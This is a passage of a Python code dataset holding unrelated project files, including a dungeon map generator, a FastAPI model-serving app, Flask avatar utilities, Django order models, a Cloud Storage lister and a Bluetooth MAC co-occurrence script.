True: # make and place rooms\n            room_space = self.make_room()\n            room_y, room_x, direct = self.__pick_wall()\n            intrsc_x = room_x # coords of tile that connects two rooms\n            intrsc_y = room_y\n            if direct == 'bot': # now this thing is horrible\n                room_y -= len(room_space)\n            elif direct == 'top':\n                room_y += 1\n            elif direct == 'rig':\n                room_x += 1\n            elif direct == 'lef':\n                room_x -= len(room_space[0])\n            if self.place_room(room_space, room_x, room_y) == True:\n                self.map_arr[intrsc_y][intrsc_x] = 1\n            else:\n                err_count = err_count + 1 # if it is impossible to place a room, that is an error\n            if err_count > 15: # if 15 errors were made, it cannot place rooms anymore\n                break\n        # for i in range(len(self.room_list)):\n        #    self.__room_size = self.__room_size + self.room_list[i][2]*self.room_list[i][3]\n\n        '''while self.__room_size < (self.__map_width*self.__map_height)*0.7:\n            room_w, room_h = self.make_room(rType='room')\n            self.place_room(room_w, room_h, 0, 0)\n            self.__room_size = 0\n            for i in range(len(self.room_list)):\n                self.__room_size = self.__room_size + self.room_list[i][2]*self.room_list[i][3]'''\n\n    def __pick_wall(self):\n        '''\n        picks a random wall attached to an existing room\n        :return: coords of tile, direction where new room should be placed\n        '''\n        while True:\n            x_wall = randrange(1, self.__map_width-2)\n            y_wall = randrange(1, self.__map_height-2)\n            if self.map_arr[y_wall][x_wall] == 2:\n                if self.map_arr[y_wall-1][x_wall] == 1:\n                    direct = 'top'\n                    break\n                elif self.map_arr[y_wall+1][x_wall] == 1:\n                    direct = 'bot'\n                    break\n                elif self.map_arr[y_wall][x_wall-1] == 1:\n                    direct = 'rig'\n                    break\n                elif self.map_arr[y_wall][x_wall+1] == 1:\n                    direct = 'lef'\n                    break\n        return y_wall, x_wall, direct\n\n    def make_room(self, rType=None):\n        '''\n        makes new room\n        :param rType: room type (None to choose randomly)\n        :return: list of tile codes\n        '''\n\n        space = []\n\n        if rType is None:\n            rType = choice(self.__room_type_list)\n\n        if rType == 'room':\n            w = randrange(2,11)\n            h = randrange(2,11)\n        elif rType == 'corridor':\n            if randint(0,1) == 0:\n                w = 1\n                h = randrange(5,11)\n            else:\n                w = randrange(5,11)\n                h = 1\n\n        for k in range(h):\n            space.append([])\n            for l in range(w):\n                space[k].append(1)\n\n        return space\n\n    def __check_space(self, w, h, x_coord, y_coord):\n        '''\n        checks if space for the new room is free\n        '''\n\n        if x_coord < 1 or y_coord < 1:\n            return False\n        if x_coord + w > self.__map_width - 2 or y_coord + h > self.__map_height - 2:\n            return False\n\n        for k in range(h):\n            for l in range(w):\n                if self.map_arr[y_coord+k][x_coord+l] == 1:\n                    return False\n        return True\n\n    def place_room(self, space, x_coord, y_coord):\n        '''\n        places room on the map\n        '''\n\n        if x_coord == 0:\n            x_coord = randrange(1,self.__map_width-2-len(space[0]))\n        if y_coord == 0:\n            y_coord = randrange(1,self.__map_height-2-len(space))\n\n        if self.__check_space(len(space[0]), len(space), x_coord, y_coord) == True: # fix!\n            space = list(reversed(space))\n            for k in range(len(space)):\n                for l in range(len(space[k])):\n                    self.map_arr[y_coord+k][x_coord+l] = space[k][l]\n        else:\n            return False\n\n        self.room_list.append([x_coord, y_coord, len(space[0]), len(space)])\n        return True\n\n\n''' map dimensions '''\n\nstart_x = 50\nstart_y = 30\n\n''' create map '''\n\nthemap = MyMap(0) # making map of the first level\nthemap.make_map(start_x, start_y)\n\n''' prints the map '''\n\nfor y in range(len(themap.map_arr)-1, -1, -1):\n    line = \"\"\n    for x in range(len(themap.map_arr[y])):\n        if themap.map_arr[y][x] == 0:\n            line += \" \"\n        if themap.map_arr[y][x] == 1:\n            line += \".\"\n        if themap.map_arr[y][x] == 2:\n            line += \"#\"\n        if themap.map_arr[y][x] == 7:\n            line += \"P\"\n    print(line)","sub_path":"levgen.py","file_name":"levgen.py","file_ext":"py","file_size_in_byte":6618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"439356312","text":"from fastapi import FastAPI\nfrom fastapi.middleware.cors import CORSMiddleware\nimport uvicorn\n\nfrom app.api import predict, dbpgsql\napp = FastAPI(\n    title='Bridges To Prosperity - FastAPI app',\n    description=\"### A Data Science API utilizing the FastAPI framework to deploy a machine learning model for the development of a full-stack web app.\",\n    version='0.3',\n    docs_url='/',\n)\n\n\napp.include_router(dbpgsql.router)\napp.include_router(predict.router)\n# app.include_router(viz.router)\n\n\n@app.get('/')\ndef docs():\n    \"\"\"\n    [Github Repo:](https://github.com/skhabiri/Bridges2Prosperity-ML-FastAPI)\n    *********************************\n    This Data Science API uses the FastAPI framework to deploy\n    a machine learning model for the development of a full-stack web app. 
The\n    predictive model is a classifier. It takes seven input features for a\n    surveyed bridge project and returns a prediction with the corresponding\n    probability of the project being rejected (0) or approved (1).\n    \n    The main dataset containing all the surveyed data is stored under the \n    table name `cleaneddata_table` in an AWS RDS database. A subset of it, \n    which is used to train the model and contains the 7 selected features, is\n    stored under the table name `model_table`.\n    \n    The data science API provides four routes:\n    1. **/data_by_bridge_code**\n    - A POST method. The user enters the `project_code` and the \n    `tablename`. The API connects to the corresponding table and fetches\n    the queried record. Both request and response bodies are in JSON format.\n    2. **/all_data**\n    - Fetches all the data from `cleaneddata_table`. Note that depending on \n    the number of records in the database this might take a while.\n    3. **/prediction**\n    - This route connects to the machine learning model. The request body is a\n    JSON object with the seven selected features and their values, and the\n    response body is the predicted class (0 for negative, 1 for positive)\n    with the probability of the prediction.\n    4. **/**\n    - The root route provides this documentation and a link to the GitHub\n    repository.\n    \"\"\"\n    return\n\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=['*'],\n    allow_credentials=True,\n    allow_methods=['*'],\n    allow_headers=['*'],\n)
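\n\n# Editorial sketch: how a client might call the /prediction route. The field\n# names below are hypothetical placeholders; the real schema lives in\n# app.api.predict.\ndef example_prediction_request(base_url='http://localhost:8000'):\n    import requests\n    payload = {'feature_1': 1.0, 'feature_7': 0.0}  # placeholder feature names\n    resp = requests.post(base_url + '/prediction', json=payload)\n    return resp.json()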
\n\nif __name__ == '__main__':\n    uvicorn.run(app)\n","sub_path":"project/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"264786353","text":"#!/usr/bin/env python\n\n\"\"\"Author: Konrad Zemek\nCopyright (C) 2015 ACK CYFRONET AGH\nThis software is released under the MIT license cited in 'LICENSE.txt'\n\nCleans up Docker containers given by their name or id. Running containers are\nkilled first. Volumes attached to the containers are removed as well (the\ncall below passes volumes=True).\n\nRun the script with the -h flag to learn about its options.\n\"\"\"\n\nimport argparse\n\nfrom environment import docker\n\n\nparser = argparse.ArgumentParser(\n    formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n    description='Clean up dockers.')\n\nparser.add_argument(\n    'docker_ids',\n    action='store',\n    nargs='*',\n    help='IDs of dockers to be cleaned up')\n\nargs = parser.parse_args()\n\ndocker.remove(args.docker_ids, volumes=True, force=True)\n","sub_path":"bamboos/docker/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"142301756","text":"from tools.lumianalysis import LAnalysis as LA\nimport numpy as np\n\n\ndef exclusion_fill(dets_file_labels: list, input_dir: str, mixed_data=False, run_stddev_test=False,\n                   c_years=False) -> None:\n\n    print('Executing exclusion mode ...\\n')\n    n_files = len(dets_file_labels)\n    if n_files < 3:\n        raise AssertionError(\"Number of detectors must be equal to or greater than 3.\")\n    det_read = []\n    years_and_dir = input_dir.split('/')\n    year = years_and_dir[1]\n    intersection = {}\n    bad_runs_in_detectors = {}\n\n    for k in range(0, n_files, 1):\n        intersection[k] = []\n\n    counts = 0\n    datatype = int\n\n    for i in range(0, n_files - 1, 1):\n        for j in range(i + 1, n_files, 1):\n            input_path = 'plots/' + year + '/' + dets_file_labels[i] + '-' + dets_file_labels[j] + \\\n                         '/txt/Bad_runs.txt'\n            try:\n                det_read.append(np.loadtxt(input_path, dtype=datatype))\n            except IOError:\n                print('\\n Missing ' + dets_file_labels[i] + '-' + dets_file_labels[j] + ' bad runs \\n')\n                det_missing = [dets_file_labels[i], dets_file_labels[j]]\n                LA(det_missing, input_dir=input_dir, mixed_data=mixed_data,\n                   run_stddev_test=run_stddev_test, c_years=c_years, exclusion=False)\n                det_read.append(np.loadtxt(input_path, dtype=datatype))\n\n            intersection[i].append(counts)\n            intersection[j].append(counts)\n            counts = counts + 1\n\n    for i in range(0, n_files, 1):\n        bad_runs_in_detectors[i] = np.intersect1d(det_read[intersection[i][0]], det_read[intersection[i][1]])\n        for j in range(2, len(intersection[i]), 1):\n            bad_runs_in_detectors[i] = np.intersect1d(bad_runs_in_detectors[i], det_read[intersection[i][j]])\n\n    filePath = 'plots/'\n    txtfileName = 'Bad_runs_in_detectors'\n    fileout = open(filePath + txtfileName + \".txt\", \"w+\")\n    for i in range(0, n_files, 1):\n        fileout.write(dets_file_labels[i] + ': ' + str(bad_runs_in_detectors[i]) + '\\n')\n    fileout.close()","sub_path":"tools/exclusion_mode.py","file_name":"exclusion_mode.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"197009103","text":"from flask_login import current_user\nfrom app.models.page import PagePermission\nfrom flask import flash\nimport os\nimport fnmatch\nimport urllib.request\nimport urllib.parse\nimport urllib.error\nimport hashlib\n\nfrom flask import render_template\n\nfrom app.models.group import Group\nfrom app.utils.file import FileAPI\n\nfrom flask_babel import lazy_gettext as _\n\nALLOWED_EXTENSIONS = set(['png', 'gif', 'jpg', 'jpeg'])\nUPLOAD_DIR = 'app/static/files/users/'\n\n\nclass UserAPI:\n    @staticmethod\n    def has_avatar(user_id):\n        \"\"\"Check if the user has uploaded an avatar.\"\"\"\n        for file in os.listdir(UPLOAD_DIR):\n            if fnmatch.fnmatch(file, 'avatar_' + str(user_id) + '.*'):\n                return True\n        return False
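\n\n    # (Editorial note) avatar() below falls back to a Gravatar identicon URL of\n    # the form https://www.gravatar.com/avatar/<md5 of lowercased email>?d=identicon&s=100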
\n    @staticmethod\n    def remove_avatar(user):\n        \"\"\"Remove avatar of a user.\"\"\"\n        # Find avatar by avatar_.*\n        for file in os.listdir(UPLOAD_DIR):\n            if fnmatch.fnmatch(file, 'avatar_' + str(user.id) + '.*'):\n                path = UPLOAD_DIR + file\n                os.remove(path)\n\n    @staticmethod\n    def avatar(user):\n        \"\"\"Return the avatar of the user.\n\n        If the user uploaded an avatar, return it.\n        If not, check whether the user has a Gravatar and return that.\n        If the user has neither an avatar nor a Gravatar, return the default\n        identicon image.\n        \"\"\"\n\n        # check if user has avatar; if so return it\n        for file in os.listdir(UPLOAD_DIR):\n            if fnmatch.fnmatch(file, 'avatar_' + str(user.id) + '.*'):\n                path = '/static/files/users/' + file\n                return path\n\n        # Set default values gravatar\n        email = user.email or ''\n        default = 'identicon'\n        size = 100\n\n        # Construct the url\n        gravatar_url = 'https://www.gravatar.com/avatar/' +\\\n            hashlib.md5(email.lower().encode('utf-8')).hexdigest() + '?'\n        gravatar_url += urllib.parse.urlencode({'d': default, 's': str(size)})\n        return gravatar_url\n\n    @staticmethod\n    def upload(f, user_id):\n        \"\"\"Upload the new avatar.\n\n        Checks if the file type is allowed and, if so, removes any\n        previously uploaded avatars.\n        \"\"\"\n        filename = f.filename\n\n        # Check if the file is allowed.\n        if filename == '':\n            return\n\n        if '.' not in filename or not filename.rsplit('.', 1)[1].lower() \\\n                in ALLOWED_EXTENSIONS:\n            flash(_('Filetype not allowed'), 'danger')\n            return\n\n        # convert the name.\n        filename = 'avatar_%d.%s' % (user_id, filename.rsplit('.', 1)[1])\n        path = os.path.join(os.getcwd(), UPLOAD_DIR, filename)\n\n        # Check if avatar exists; if so remove.\n        filename_noext, filename_ext = FileAPI.split_name(filename)\n\n        for file in os.listdir(UPLOAD_DIR):\n            if fnmatch.fnmatch(file, filename_noext + '.*'):\n                remove_path = os.path.join(os.getcwd(), UPLOAD_DIR, file)\n                os.remove(remove_path)\n\n        # Save file.\n        f.save(path)\n        os.chmod(path, 0o644)\n        return\n\n    @staticmethod\n    def get_groups_for_user_id(user):\n        \"\"\"Return all the groups the given user belongs to.\n\n        If there is no user (not signed in), the 'all' group is returned if it\n        exists; otherwise an exception is raised, because the 'all' group must\n        always exist.\n\n        I believe we can't put this in User because current_user can be None\n        when nobody is logged in, but I might be mistaken. (Inja,\n        July 10 2013).\n        \"\"\"
\n        if not user or not user.id:\n            group = Group.query.filter(Group.name == 'all').first()\n\n            if not group:\n                raise Exception(\"No group 'all', this should never happen!\")\n            return [group]\n\n        return user.groups.order_by(Group.name)\n\n    @staticmethod\n    def get_groups_for_current_user():\n        \"\"\"Call the get_groups_for_user_id function with current user.\"\"\"\n        return UserAPI.get_groups_for_user_id(current_user)\n\n    @staticmethod\n    def can_read(page):\n        if page.needs_paid and (current_user.is_anonymous or\n                                not current_user.has_paid):\n            return False\n\n        return PagePermission.get_user_rights(current_user, page.id) > 0\n\n    @staticmethod\n    def can_write(page):\n        return PagePermission.get_user_rights(current_user, page.id) > 1\n\n    @staticmethod\n    def get_membership_warning():\n        \"\"\"Render a warning if the current user has not paid.\"\"\"\n        if current_user.is_anonymous or\\\n                (current_user.is_authenticated and\n                 (current_user.has_paid or current_user.alumnus)):\n            return ''\n\n        return render_template('user/membership_warning.htm')\n","sub_path":"app/utils/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"606676688","text":"\n# https://github.com/GoogleCloudPlatform/python-docs-samples/blob/master/storage/api/list_objects.py\n#\nimport googleapiclient.discovery\nimport googleapiclient.http\n\n\nbucket = 'affymetrix-tmp-staging'\nfilename = 'examplefile'\n\ndef create_service():\n    return googleapiclient.discovery.build('storage', 'v1')\n\n\ndef get_bucket_metadata(bucket):\n    \"\"\"Retrieves metadata about the given bucket.\"\"\"\n    service = create_service()\n\n    # Make a request to buckets.get to retrieve the metadata of the\n    # specified bucket.\n    req = service.buckets().get(bucket=bucket)\n    return req.execute()\n\ndef list_bucket(bucket):\n    \"\"\"Returns a list of metadata of the objects within the given bucket.\"\"\"\n    service = create_service()\n\n    # Create a request to objects.list to retrieve a list of objects.\n    fields_to_return = \\\n        'nextPageToken,items(name,size,contentType,metadata(my-key))'\n    req = service.objects().list(bucket=bucket, fields=fields_to_return)\n\n    all_objects = []\n    # If you have too many items to list in one request, list_next() will\n    # automatically handle paging with the pageToken.\n    while req:\n        resp = req.execute()\n        all_objects.extend(resp.get('items', []))\n        req = service.objects().list_next(req, resp)\n    return all_objects\n\n\ndef print_all():\n    objects = list_bucket(bucket)\n    for obj in objects:\n        print(str(obj))\n\n\n#print_all()\n\nr = get_bucket_metadata(bucket)\nprint(str(r))\n","sub_path":"google_cloud/storage/bucket_storage_api.py","file_name":"bucket_storage_api.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"510431945","text":"class User():\n\n    def __init__(self, first, last):\n        self.first = first\n        self.last = last\n        self.login_attempts = 0\n\n    def greet_user(self):\n        print(\"Hi \"+self.first.title()+\" \" +\n              self.last.title()+\", welcome to the party!\")\n\n    def count_login_attempts(self):\n        self.login_attempts += 1\n        login_counts = self.login_attempts\n        print(\"Login attempts \"+str(login_counts))\n\n    def reset_login_attempts_count(self):\n        self.login_attempts = 0\n        print(\"Login attempts reset to \"+str(self.login_attempts))\n\n\nclass Admin(User):\n    def __init__(self, first, last):\n        
super().__init__(first, last)\n        self.privileges = ['can add post',\n                           'can delete post',\n                           'can ban user']\n\n    def show_privileges(self):\n        print(\"Admin privileges\")\n        for privilege in self.privileges:\n            print(\"- \"+privilege)\n\n    def get_privileges(self):\n        current_privilege = []\n        for privilege in self.privileges:\n            current_privilege.append(privilege)\n        return current_privilege\n\n\nuser1 = Admin('ebo', 'riley')\nuser1.show_privileges()\nprint(user1.get_privileges())\nfor privilege in user1.get_privileges():\n    print(\"- \"+privilege)\n","sub_path":"admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"259143065","text":"from django.db import models\nfrom core.models import Company, Site, EmployeeManager\nfrom opticon.globalstrings import Globalstrings\nimport core.models\n\ndef print_str(self):\n\tif self.order_from:\n\t\treturn \"%s - %s orders from %s\" % (str(self.site), str(self.order_from.company), str(self.company))\n\telse:\n\t\treturn str(self.site)\n\t\t\n# Order (German: Auftrag)\nclass Order(models.Model):\n\tordernumber_required = models.BooleanField(default=False)\n\tordernumber = models.CharField(max_length=200)\n\n\tsite = models.ForeignKey(Site)\n\torder_from = models.ForeignKey('Order', null=True, blank=True)\n\tcompany = models.ForeignKey(Company, related_name='order', null=False, blank=True)\n\t#subcompany = models.ManyToManyField(Company, related_name='subcompany', null=True, blank=True)\n\n\tAPPROVED = 'Y'\n\tAPPROVING = 'C'\n\tDENIED = 'D'\n\tgs = Globalstrings()\n\tORDERNUMBER_APPROVED_CHOICES = (\n\t\t(APPROVED, gs.yes),\n\t\t(APPROVING, gs.approving),\n\t\t(DENIED, gs.no),\n\t)\n\tordernumber_approved = models.CharField(\n\t\tmax_length=1,\n\t\tchoices=ORDERNUMBER_APPROVED_CHOICES, \n\t\tdefault='', \n\t\tnull=False, \n\t\tblank=True\n\t)\n\n\tdef __str__(self):\n\t\tif self.ordernumber:\n\t\t\treturn self.ordernumber\n\t\telse:\n\t\t\treturn print_str(self)\n\t\t\n\tdef get_site_orderer(self):\n\t\tif self.order_from:\n\t\t\treturn str(self.site) + ' - ' + str(self.order_from.company)\n\t\telse:\n\t\t\treturn str(self.site)\n\n\tdef delete_ordernumber(self):\n\t\tself.ordernumber = ''\n\t\tself.ordernumber_approved = ''\n\t\tself.save()\n\t\treturn self\n\t\t\nclass OrderManager(models.Manager):\n\t\n\tdef get_orders_of_company(employer): # @NoSelf\n\t\treturn Order.objects.filter(company=employer)\n\t\n\tdef get_orders_of_employee(employee): # @NoSelf\n\t\torders = Order.objects.filter(id__in = core.models.IdentityCard.objects.filter(employee=employee).values('order_id'))\n\t\treturn orders\n\n\tdef get_employees_of_order(order, present=None, faulty=None):\n\t\t# Get all Identity Cards for this order\n\t\tids = core.models.IdentityCard.objects.filter(order_id = order)\n\n\t\t# Filter for present ID Cards\n\t\tif present:\n\t\t\tids = ids.filter(present=True)\n\n\t\t# Get all Employees of ID Cards\n\t\temployees = core.models.Employee.objects.filter(employee__in=ids)\n\t\t\n\t\t# Initialise Employees \n\t\t# Assign the ID Cards to the Employee Objects\n\t\tinit_employees = []\n\t\tfor employee in employees:\n\t\t\tidcardManager = core.models.IDCardManager()\n\t\t\temployee.idcards = idcardManager.get_idcards(employee=employee, order_id=order)\n\t\t\tif len(employee.idcards) == 1:\n\t\t\t\temployee.idcard = employee.idcards[0]\n\t\t\temployee.init()\n\n\t\t\tif faulty:\n\t\t\t\tif 
employee.is_faulty:\n\t\t\t\t\tinit_employees.append(employee)\n\t\t\telse:\n\t\t\t\tinit_employees.append(employee)\n\n\t\treturn init_employees\n\n\tdef get_count_employees_of_order(order):\n\t\temployees_list = []\n\t\tfaulty_employees_list = []\n\t\tpresent_employees_list = []\n\n\t\t# Get all Identity Cards for this order\n\t\tids = core.models.IdentityCard.objects.filter(order_id = order)\n\n\t\t# Get all Employees of ID Cards\n\t\temployees = core.models.Employee.objects.filter(employee__in=ids)\n\t\t\n\t\t# Assign the ID Cards to the Employee Objects\n\t\tfor employee in employees:\n\t\t\tidcardManager = core.models.IDCardManager()\n\t\t\temployee.idcards = idcardManager.get_idcards(employee=employee, order_id=order)\n\t\t\temployee.init()\n\n\t\t\t# Filter for faulty ID Cards\n\t\t\tif employee.is_faulty:\n\t\t\t\tfaulty_employees_list.append(employee)\n\t\t\t# Filter for present ID Cards\n\t\t\tif employee.idcards[0].present:\n\t\t\t\tpresent_employees_list.append(employee)\n\t\t\temployees_list.append(employee)\n\n\t\tcounts = {\n\t\t\t'count_all_employees': len(employees_list),\n\t\t\t'count_faulty_employees': len(faulty_employees_list),\n\t\t\t'count_present_employees': len(present_employees_list),\n\t\t}\n\t\treturn counts\n\n\tdef get_siteowner_orders(site):\n\t\t# order_from__isnull=True means that this order is the \"order\" we created for the site owners (Bauherren)\n\t\tsiteowner_orders = Order.objects.filter(order_from__isnull=True).filter(site = site)\n\t\treturn siteowner_orders\n\n\tdef get_suborders(order):\n\t\torders = Order.objects.filter(order_from=order).filter(site = order.site)\n\t\treturn orders\n\t\n\tdef make_order_from_invitation(request, invitation): # @NoSelf\n\t\temployer = EmployeeManager.get_employer(request)\n\t\torder = Order()\n\t\torder.site = invitation.site\n\t\torder.order_from = invitation.order_from\n\t\torder.company = employer\n\t\torder.save()\n\t\t#order.order_from.subcompany.add(employer)\n\t\t#order.order_from.save()\n\t\t#invitation.delete()\n\t\treturn order\n\t\n\tdef make_order_from_new_invitation(employer, invitation): # @NoSelf\n\t\torder = Order()\n\t\torder.site = invitation.site\n\t\torder.order_from = invitation.order_from\n\t\torder.company = employer\n\t\torder.save()\n\t\t#order.order_from.subcompany.add(employer)\n\t\t#order.order_from.save()\n\t\t#invitation.delete()\n\t\treturn order\n","sub_path":"opticon/core/models/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":4696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"642701539","text":"class Temperatura(object):\n    def __init__(self):\n        pass\n\n    def mediaTemperatura(self, janeiro=None, fevereiro=None, marco=None, abril=None, maio=None, junho=None, julho=None, agosto=None, setembro=None, outubro=None, novembro=None, dezembro=None):\n        # Average over the longest run of months provided, starting in January.\n        # (Same behaviour as the original giant if/elif chain, without the\n        # duplication; a single month now also returns a proper tuple.)\n        meses = [janeiro, fevereiro, marco, abril, maio, junho, julho, agosto, setembro, outubro, novembro, dezembro]\n        valores = []\n        for mes in meses:\n            if mes is None:\n                break\n            valores.append(mes)\n\n        if not valores:\n            return None, None\n\n        mediaTemperatura = sum(valores) / len(valores)\n        listaTemperatura = tuple(valores)\n        return mediaTemperatura, listaTemperatura\n\n\n    def perdasTemperatura(self, temperaturaMedia, tipoDeEstrutura, temperaturaReferencia, coefPmax):\n        # temperature of each month corrected for the structure type, then the\n        # resulting loss in percent\n        lista = [t + (tipoDeEstrutura - temperaturaReferencia) for t in temperaturaMedia]\n        return [100 + t * coefPmax for t in lista]\n\n\n\n    def fatorDesempenhoGlobal(self, listaTempMensal, perdasTotais):\n        return [(t * perdasTotais) / 10000 for t in listaTempMensal]
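\n\n# Editorial usage sketch (hypothetical coefficients):\nif __name__ == '__main__':\n    t = Temperatura()\n    media, meses = t.mediaTemperatura(janeiro=25.0, fevereiro=26.5, marco=24.0)\n    perdas = t.perdasTemperatura(meses, tipoDeEstrutura=30, temperaturaReferencia=25, coefPmax=-0.4)\n    print(media, perdas, t.fatorDesempenhoGlobal(perdas, perdasTotais=80))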
\n","sub_path":"Temperatura.py","file_name":"Temperatura.py","file_ext":"py","file_size_in_byte":4931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"549298680","text":"\n\"\"\" Module summary:\nUtility functions for checking login, accessing user data, and managing \nuser images:\n    login_required - Verify that a user is logged in when required.\n    createUser - Create a new user and add them to the database.\n    getUserInfo - Retrieve user object by their id.\n    getUserID - Retrieve a user's id by their email address.\n    allowedFile - Determine if the file has an allowed extension.\n    imageUploadProfile - Upload a profile image.\n    imageDeleteProfile - Delete a profile image.\n    imageUploadItem - Upload a catalog item image.\n    imageDeleteItem - Delete a catalog item image.\n\"\"\"\n\nimport os\nfrom functools import wraps\nfrom werkzeug.utils import secure_filename\n\nfrom flask import session as login_session\nfrom flask import Blueprint, current_app, url_for, flash, redirect\n\nfrom itemcatalog.database.dbsetup import User\nfrom itemcatalog.database.dbconnect import db_session\n\n############################################################################\n\nutil = Blueprint(\"util\", __name__)\n\n# Helper functions for user login processes:\ndef login_required(f):\n    \"\"\"Verify that a user is logged in when required.\"\"\"\n    @wraps(f)\n    def decorated_function(*args, **kwargs):\n        if \"user_id\" in login_session:\n            return f(*args, **kwargs)\n        else:\n            flash(\"You are not allowed to access that page.\")\n            return redirect('/login')\n    return decorated_function\n\n\ndef createUser(login_session):\n    \"\"\"Create a new user and add them to the database.\"\"\"\n    newUser = User(name=login_session[\"g_username\"],\n                   email=login_session[\"email\"])\n    db_session.add(newUser)\n    db_session.commit()\n    user = db_session.query(User).filter_by(email=login_session[\"email\"]).one()\n    return user.id\n\n\ndef getUserInfo(user_id):\n    \"\"\"Retrieve user object by their id.\"\"\"\n    user = db_session.query(User).filter_by(id=user_id).one()\n    return user\n\n\ndef getUserID(email):\n    \"\"\"Retrieve a user's id by their email address.\"\"\"\n    try:\n        user = db_session.query(User).filter_by(email=email).one()\n        return user.id\n    except Exception:\n        return None\n\n\n\n############################################################################\n\n\n# Helper functions for managing images:\ndef allowedFile(filename):\n    \"\"\"Determine if the file has an allowed extension.\"\"\"\n    app = current_app\n    \n    return \".\" in filename and \\\n        filename.rsplit(\".\",1)[1].lower() in app.config['ALLOWED_EXTENSIONS']\n\n\ndef imageUploadProfile(farm_id, file):\n    \"\"\"Upload a profile image.\"\"\"\n    app = current_app\n    if file and allowedFile(file.filename):\n        filename = str(farm_id) + \"_\" + file.filename\n        filename = secure_filename(filename)\n        filedir = os.path.join(app.config['UPLOAD_FOLDER_PROFILE'], filename)\n\n        file.save(filedir)\n        return filename\n\n    else:\n        return None\n\n\ndef imageDeleteProfile(filename):\n    \"\"\"Delete a profile image.\"\"\"\n    app = current_app\n    os.remove(os.path.join(app.config['UPLOAD_FOLDER_PROFILE'], filename))\n\n\ndef imageUploadItem(farm_id, item_id, file):\n    \"\"\"Upload a catalog item image.\"\"\"\n    app = current_app\n    if file and allowedFile(file.filename):\n        filename = \"_\".join([str(farm_id),str(item_id),file.filename])\n        filename = secure_filename(filename)\n        filedir = os.path.join(app.config['UPLOAD_FOLDER_ITEM'], filename)\n
        file.save(filedir)\n        return filename\n\n    else:\n        return None\n\n\ndef imageDeleteItem(filename):\n    \"\"\"Delete a catalog item image.\"\"\"\n    app = current_app\n    os.remove(os.path.join(app.config['UPLOAD_FOLDER_ITEM'], filename))\n","sub_path":"itemcatalog/views/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"167813519","text":"import os\n# Runnable objects used in a pool map by calling run() on each instance\nfrom Helpers import printVerbose\n\nclass ProgramRunner(object):\n    commands = {\n        \"HMMER_COMMAND\" : \"hmmscan -o %s.out %s %s\",\n        #\"HMMER_COMMAND\" : \"hmmscan %s %s > %s.out\",\n        \"BLAST_COMMAND\" : \"blastall -p blastn -i %s -d %s -o %s -F F -e 1e-05 -b 10 -v 10 \",\n        \"CLUSTER_COMMAND\" : \"cd-hit-est -c 0.995 -i %s -o %s\"\n    }\n\n    def __init__(self, program, params):\n        self.program = program\n        self.command = self.commands[program] % tuple(params)\n\n    def run(self):\n        if printVerbose.VERBOSE:\n            os.system(self.command)\n        else:\n            # for windows we would want to use NUL instead of /dev/null\n            os.system( \" \".join([self.command, \"> /dev/null 2> /dev/null\"]))\n    def dryRun(self):\n        return self.command
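\n\n# Editorial usage sketch (the file names are hypothetical):\nif __name__ == '__main__':\n    runner = ProgramRunner(\"CLUSTER_COMMAND\", [\"input.fasta\", \"clusters.out\"])\n    print(runner.dryRun())  # cd-hit-est -c 0.995 -i input.fasta -o clusters.out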
\n","sub_path":"commands/classes/ProgramRunner.py","file_name":"ProgramRunner.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"554406261","text":"import pandas as pd\n\n# known records\n# achituv -\nmac_to_test = 'FD2C6017D58D'\ndf = pd.read_csv('BTData_September2020/tripsRaw - 2020-09-12.csv')\n\nsum_df = pd.DataFrame(index=df['MAC'].unique())\nsum_df['agg'] = 0\n\ndf['via_to'] = df['VIAUNITC'] + df['TOUNITC']\nmac_df = df[df['MAC'] == mac_to_test]\nprint(mac_df.shape[0])  # number of trips recorded for this MAC\n# iterate over:\nfor index, row in mac_df.iterrows():\n    via_to = row['via_to']\n    time = row['LASTDISCOTS']\n    temp_df = df[(df['MAC'] != mac_to_test) & (df['via_to'] == via_to) & (abs(df['LASTDISCOTS'] - time) < 60)]\n    for inner_index, inner_row in temp_df.iterrows():\n        sum_df.at[inner_row['MAC'], 'agg'] += 1\n    # print(via_to)\n    # print(time)\n    # print(temp_df['MAC'])\n    # print(temp_df['LASTDISCOTS'] -time)\nsum_df.to_csv('BTData_September2020/find_mac120920.csv')\n","sub_path":"corona/find_macs.py","file_name":"find_macs.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
